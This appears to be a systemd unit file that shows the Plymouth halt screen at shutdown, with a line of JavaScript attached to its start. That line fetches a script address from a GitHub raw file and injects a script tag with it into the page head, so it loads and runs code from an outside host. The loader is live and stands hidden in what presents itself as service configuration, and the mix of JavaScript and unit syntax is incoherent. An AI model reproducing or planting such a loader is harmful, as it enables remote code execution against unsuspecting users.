;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
[Unit] Description=Show Plymouth Halt Screen After=getty@tty1.service display-manager.service plymouth-start.service Before=systemd-halt.service DefaultDependencies=no ConditionKernelCommandLine=!plymouth.enable=0 ConditionKernelCommandLine=!nosplash ConditionKernelCommandLine=splash [Service] ExecStart=/sbin/plymouthd --mode=shutdown --attach-to-session ExecStartPost=-/bin/plymouth show-splash Type=forking